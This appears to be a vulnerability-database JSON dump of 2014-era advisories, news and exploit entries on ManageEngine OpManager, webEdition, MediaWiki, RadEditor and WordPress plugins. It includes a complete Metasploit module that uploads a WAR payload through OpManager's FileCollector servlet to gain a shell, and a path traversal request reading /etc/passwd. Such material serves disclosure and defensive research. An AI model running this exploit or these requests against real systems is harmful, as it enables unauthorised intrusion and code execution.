\r\nReferences:\r\n \r\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\r\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87286", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "poc"}, {"lastseen": "2017-11-19T13:12:44", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-09-29T00:00:00", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5258"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87276", "id": "SSV:87276", "sourceData": "\n Advisory ID: HTB23227\r\nProduct: webEdition\r\nVendor: webEdition e.V.\r\nVulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985) and probably prior\r\nTested Version: 6.3.8.0 (SVN-Revision: 6985)\r\nAdvisory Publication: August 6, 2014 [without technical details]\r\nVendor Notification: August 6, 2014\r\nVendor Patch: September 4, 2014\r\nPublic Disclosure: September 17, 2014\r\nVulnerability Type: Path Traversal [CWE-22]\r\nCVE Reference: CVE-2014-5258\r\nRisk Level: Medium\r\nCVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.\r\n \r\n \r\n1) Path Traversal in webEdition: CVE-2014-5258\r\n \r\nThe vulnerability exists due to insufficient sanitization of the "file" HTTP GET parameter in "/webEdition/showTempFile.php" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. "../") and read contents of arbitrary files on the target system with privileges of the web server.\r\n \r\nThe exploitation example below display contents of "/etc/passwd" file:\r\n \r\nhttp://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd\r\n \r\nSuccessful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application.\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to webEdition 6.3.9 Beta\r\n \r\nMore Information:\r\nhttp://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nReferences:\r\n \r\n[1] High-Tech Bridge Advisory HTB23227 - https://www.htbridge.com/advisory/HTB23227 - Path Traversal in webEdition.\r\n[2] webEdition - http://www.webedition.org - is a Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87276", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "status": "poc"}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"], "references": ["https://vulners.com/OSVDB/OSVDB:112276"], "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet regionID parameter\n\nVulnerability Type: File Upload", "reporter": "Dsquare Security", "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "_object_type": "robots.models.dsquare.DsquareBulletin", "modified": "2014-11-30T00:00:00", "id": "E-410", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-26T15:33:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"], "references": ["https://vulners.com/OSVDB/OSVDB:112277"], "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "reporter": "Dsquare Security", "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035"], "_object_type": "robots.models.dsquare.DsquareBulletin", "modified": "2014-11-30T00:00:00", "id": "E-407", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:16", "references": ["https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the MultipartRequestServlet servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "reporter": "Andrea Micalizzi (rgod)", "published": "2015-04-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "ManageEngine OpManager MultipartRequestServlet filename File Upload Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-6036"], "modified": "2015-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-113", "id": "ZDI-15-113", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:17:58", "references": ["https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "reporter": "Andrea Micalizzi (rgod)", "published": "2015-04-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-6035"], "modified": "2015-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-142", "id": "ZDI-15-142", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:12", "references": ["https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileCollector servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "reporter": "Andrea Micalizzi (rgod)", "published": "2015-04-15T00:00:00", "title": "ManageEngine OpManager FileCollector FILENAME File Upload Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-6034"], "modified": "2015-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-143", "id": "ZDI-15-143", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "references": ["https://bugzilla.wikimedia.org/show_bug.cgi?id=70672", "http://www.openwall.com/lists/oss-security/2014/10/02/36", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7295", "https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-October/000163.html"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "1.23.5-1", "packageName": "mediawiki", "arch": "any", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "It was discovered that MediaWiki, a wiki engine, was separating the\nallowance of css and js modules resulting in Cross-site Scripting (XSS)\nand UI redressing issues.", "reporter": "Arch Linux", "published": "2014-10-04T00:00:00", "title": "mediawiki: Cross-site Scripting (XSS) and UI redressing", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-04T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000114.html", "id": "ASA-201410-3", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "threatpost": [{"lastseen": "2016-09-04T20:51:05", "references": ["http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/", "http://feedback.telerik.com/Project/108/Feedback/Details/137364-prevent-possible-xss-attack-in-radeditor-using-malicious-content-in-ie", "https://threatpost.com/latest-windows-uac-bypass-permits-code-execution/119887/", "https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/", "https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/", "http://demos.telerik.com/aspnet-ajax/editor/examples/overview/defaultcs.aspx", "http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks"], "description": "All versions of an HTML editor used in several Microsoft technologies, including ASP.NET, suffer from a high-risk cross-site scripting (XSS) vulnerability that could allow an attacker to inject malicious script and glean private information.\n\nThe problem exists in all versions of RadEditor, a WYSIWYG text editor manufactured by Bulgaria-based firm Telerik, according to security researcher G.S. McNamara, who disclosed the vulnerability on [his blog late last week](<http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/>).\n\n### Related Posts\n\n#### [EFF Blasts Microsoft Over \u2018Malicious\u2019 Windows 10 Rollout Tactics](<https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/> \"Permalink to EFF Blasts Microsoft Over \u2018Malicious\u2019 Windows 10 Rollout Tactics\" )\n\nAugust 18, 2016 , 4:38 pm\n\n#### [Latest Windows UAC Bypass Permits Code Execution](<https://threatpost.com/latest-windows-uac-bypass-permits-code-execution/119887/> \"Permalink to Latest Windows UAC Bypass Permits Code Execution\" )\n\nAugust 15, 2016 , 3:35 pm\n\n#### [Microsoft Mistakenly Leaks Secure Boot Key](<https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/> \"Permalink to Microsoft Mistakenly Leaks Secure Boot Key\" )\n\nAugust 11, 2016 , 11:31 am\n\n\u201cTechnically speaking, this is a massive hole in how existing input validation security filters work in unison,\u201d McNamara said in an email Thursday to Threatpost regarding the vulnerability.\n\nThe editor, which allows users to input rich-text, is used to varying degrees in Microsoft products like [MSDN, CodePlex, TechNet, and MCMS, along with some Sharepoint and ASP.NET implementations](<http://demos.telerik.com/aspnet-ajax/editor/examples/overview/defaultcs.aspx>).\n\n\u201cIt\u2019s a silent killer, too, because at least one commercial penetration-testing tool failed to find it\u201d McNamara said, \u201cYou just get a false negative.\u201d\n\nMcNamara initially found the vulnerability (CVE-2014-4958) in a 2009 version (2009.3.1208.20) of the product on Internet Explorer along with a 2014 version but suggests it could have existed in previous iterations of the editor.\n\n\u201cI just had a hunch and followed it obsessively, manually,\u201d McNamara said of his search for the bug, which he first dug up on July 9.\n\nFrom there it took about two months of going back and forth with the company.\n\nWhen he first contacted Telerik\u2019s Customer Support department, it insisted the bug had already been fixed. To prove his case McNamara forwarded the company his exploit code. When Telerik still wouldn\u2019t put him in touch with anyone in charge of security, McNamara ultimately had to go through what he calls \u201cunofficial channels,\u201d by sending a personal email to a Telerik employee\u2019s Gmail account in late August, to finally get the ball rolling.\n\nIt wasn\u2019t until earlier this month that the researcher and the company agreed to coordinate a disclosure. Yet after two weeks of radio silence from Telerik \u2013 McNamara claims he made multiple phone calls, emails, requests to high-level account managers \u2013 he decided to disclose the bug independently \u2014 only to have the company release its information \u201cout of the blue,\u201d hours before he was planning on releasing his, last Wednesday.\n\n\u201cResolving this politely was tough,\u201d McNamara admits, claiming the issue lasted as long as it did due to a lapse in responsibility.\n\n\u201cThis is a technical product sold to technical developers, and Telerik wanted the developers to share the responsibility of security. The developers probably didn\u2019t know that,\u201d McNamara said.\n\nWhile RadEditor\u2019s filters cover some attack vectors \u2013 namely the RemoveScripts filter to strip out script tags \u2013 the attack technique that McNamara used \u201cis not your typical XSS.\u201d\n\n\u201cBy using lesser-known attacks I found a way through,\u201d McNamara said, adding that he put to use some old research by WhiteHat Security\u2019s Jeremiah Grossman to help dig up the vulnerability.\n\nSpecifically the vulnerability employs attribute-based cross-site scripting without relying on JavaScript tags. It\u2019s also harder to detect because the web editor has to process many different obfuscated elements, notably dynamic properties like CSS Expressions, used in older builds of IE, in addition to JavaScript.\n\nIn a blog entry Telerik [posted on Wednesday](<http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks>) the company addressed the issue and gave credit to McNamara but stood pat on its stance that the responsibility of sanitizing content to prevent threats should fall to the developer.\n\n\u201cIt is always the duty of the developer to implement the necessary content validation,\u201d Nikodim Lazarov, one of the company\u2019s senior software developers wrote.\n\nThe company is slated to push out a patch for the issue but not until it updates the Q3 edition of its controls, in late October. In the meantime Telerik is [giving users a workaround](<http://feedback.telerik.com/Project/108/Feedback/Details/137364-prevent-possible-xss-attack-in-radeditor-using-malicious-content-in-ie>) that it\u2019s strongly recommending users follow until its patch is pushed.\n\nMcNamara, who works as an application security engineer at the IT services provider CGI, says that he\u2019s planning to do further research in his spare time on other rich text editors like RadEditor to see if he can find similar problems.\n\n\u201cMost of the company\u2019s user base is likely unaware that they silently integrated a high-risk vulnerability into their site,\u201d McNamara says of bug in closing, \u201cSystem owners signed off on this without knowing.\u201d", "edition": 1, "reporter": "Chris Brook", "published": "2014-09-29T12:15:00", "title": "Web Editor Vulnerable To XSS Attacks", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "threatpost", "threatPostCategory": "Vulnerabilities", "bulletinFamily": "info", "cvelist": ["CVE-2014-4958"], "modified": "2014-10-01T19:22:03", "href": "https://threatpost.com/radeditor-web-editor-vulnerable-to-xss-attacks/108594/", "id": "RADEDITOR-WEB-EDITOR-VULNERABLE-TO-XSS-ATTACKS/108594", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "typo3": [{"lastseen": "2016-09-28T15:30:19", "references": [], "description": "It has been discovered that the extension \"phpMyAdmin\" (phpmyadmin) is susceptible to Cross-Site Scripting.\n\n**Release Date:** November 5, 2014\n\n**Component Type:** Third party extension. This extension is not a part of the TYPO3 default installation.\n\n**Affected Versions:** 4.18.0, 4.18.1, 4.18.2 and 4.18.3\n\n**Vulnerability Type:** XSS\n\n**Severity:** Low\n\n**Suggested CVSS v2.0:** AV:N/AC:H/Au:S/C:P/I:P/A:N/E:ND/RL:O/RC:C\n\n**References:** [PMASA-2014-11](<http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php>)\n\n**Related CVE:** CVE-2014-7217\n\n**Problem Description:** Crafted database content can trigger XSS in table search and table structure pages.\n\n**Solution:** An updated version 4.18.4 is available from the TYPO3 extension manager and at <http://typo3.org/extensions/repository/download/phpmyadmin/4.18.4/t3x/>. Users of the extension are advised to update the extension as soon as possible.\n\n**Credits:** The vendor of the phpMyAdmin upstream software credits Ashutosh Dhundhara. Thanks to Andreas Beutel for providing a TYPO3 extension package with an updated phpMyAdmin version.\n\n**General advice:** Follow the recommendations that are given in the [TYPO3 Security Guide](<http://docs.typo3.org/typo3cms/SecurityGuide/> \"Initiates file download\" ). Please subscribe to the [typo3-announce mailing list](<http://lists.typo3.org/cgi-bin/mailman/listinfo/typo3-announce> \"Opens external link in new window\" ) to receive future Security Bulletins via E-mail.\n", "edition": 1, "reporter": "TYPO3 Association", "published": "2014-11-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "typo3", "title": "Cross-Site Scripting vulnerability in extension phpMyAdmin (phpmyadmin)", "bulletinFamily": "software", "affectedSoftware": [{"name": "phpmyadmin", "version": "4.18.0", "operator": "eq"}, {"name": "phpmyadmin", "version": "4.18.2", "operator": "eq"}, {"name": "phpmyadmin", "version": "4.18.1", "operator": "eq"}, {"name": "phpmyadmin", "version": "4.18.3", "operator": "eq"}], "cvelist": ["CVE-2014-7217"], "modified": "2014-11-05T00:00:00", "id": "TYPO3-EXT-SA-2014-016", "href": "https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-016/", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "metasploit": [{"lastseen": "2018-09-19T13:40:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. The vulnerability exists in the FileCollector servlet which accepts unauthenticated file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on version 11.0 of SocialIT for Windows and Linux.", "reporter": "Rapid7", "published": "2014-09-27T18:33:49", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/http/opmanager_socialit_file_upload.rb", "type": "metasploit", "title": "ManageEngine OpManager and Social IT Arbitrary File Upload", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-09-15T23:54:45", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SOCIALIT_FILE_UPLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine OpManager and Social IT Arbitrary File Upload',\n 'Description' => %q{\n This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\n The vulnerability exists in the FileCollector servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\n version 11.0 of SocialIT for Windows and Linux.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-6034' ],\n [ 'OSVDB', '112276' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Sep/110' ]\n ],\n 'Privileged' => true,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 27 2014'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptInt.new('SLEEP',\n [true, 'Seconds to sleep while we wait for WAR deployment', 15]),\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\n 'method' => 'GET'\n })\n\n # A GET request on this servlet returns \"405 Method not allowed\"\n if res and res.code == 405\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def upload_war_and_exec(try_again, app_base)\n tomcat_path = '../../../tomcat/'\n servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\n\n if try_again\n # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\n # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\n # The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments.\n # After replacing the context.xml file let's upload the WAR again.\n print_status(\"Replacing Tomcat context file\")\n send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\n 'ctype' => 'application/xml',\n 'vars_get' => {\n 'regionID' => tomcat_path + \"conf\",\n 'FILENAME' => \"context.xml\"\n }\n })\n else\n # We need to create the upload directories before our first attempt to upload the WAR.\n print_status(\"Creating upload directories\")\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\n send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\n 'ctype' => 'application/xml',\n 'vars_get' => {\n 'regionID' => \"\",\n 'FILENAME' => bogus_file\n }\n })\n register_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\n end\n\n war_payload = payload.encoded_war({ :app_name => app_base }).to_s\n\n print_status(\"Uploading WAR file...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => war_payload,\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'regionID' => tomcat_path + \"webapps\",\n 'FILENAME' => app_base + \".war\"\n }\n })\n\n # The server either returns a 500 error or a 200 OK when the upload is successful.\n if res and (res.code == 500 or res.code == 200)\n print_good(\"Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\n \" seconds for deployment\")\n sleep(datastore['SLEEP'])\n else\n fail_with(Failure::Unknown, \"#{peer} - WAR upload failed\")\n end\n\n print_status(\"Executing payload, wait for session...\")\n send_request_cgi({\n 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\n 'method' => 'GET'\n })\n end\n\n\n def exploit\n app_base = rand_text_alphanumeric(4 + rand(32 - 4))\n\n upload_war_and_exec(false, app_base)\n register_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\n\n sleep_counter = 0\n while not session_created?\n if sleep_counter == datastore['SLEEP']\n print_error(\"Failed to get a shell, let's try one more time\")\n upload_war_and_exec(true, app_base)\n return\n end\n\n sleep(1)\n sleep_counter += 1\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/opmanager_socialit_file_upload.rb"}], "canvas": [{"lastseen": "2016-09-25T14:12:07", "references": [], "description": "**Name**| CVE_2014_5460 \n---|--- \n**CVE**| CVE-2014-5460 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2014-5460 \n**Notes**| CVE Name: CVE-2014-5460 \nVENDOR: Tribulant \nChangelog: https://wordpress.org/plugins/slideshow-gallery/changelog/ \nNotes: \n \nIf the Suhosin-Patch is installed (typically announced in the PHP banner) the MOSDEF PHP \nshell startup will not work however the vulnerability will still be exploitable. \n \nThis is a post authentication shell upload vulnerability in a popular (400k+ downloads) \nwordpress plugin. By default only admins can reach the vulnerability. \n \nThe plugin does allow for administrators to give any class of user the ability to \ninteract with the vulnerable functionality, though they would have to do so deliberately. \n \nRepeatability: Infinite \nReferences: http://packetstormsecurity.com/files/128069/WordPress-Slideshow-Gallery-1.4.6-Shell-Upload.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460 \nCERT Advisory: None \nDate public: 08/31/14 \n\n", "edition": 1, "reporter": "Immunity Canvas", "published": "2014-09-11T11:55:05", "title": "Immunity Canvas: CVE_2014_5460", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "canvas", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5460"], "modified": "2014-09-11T11:55:05", "id": "CVE_2014_5460", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2014_5460", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
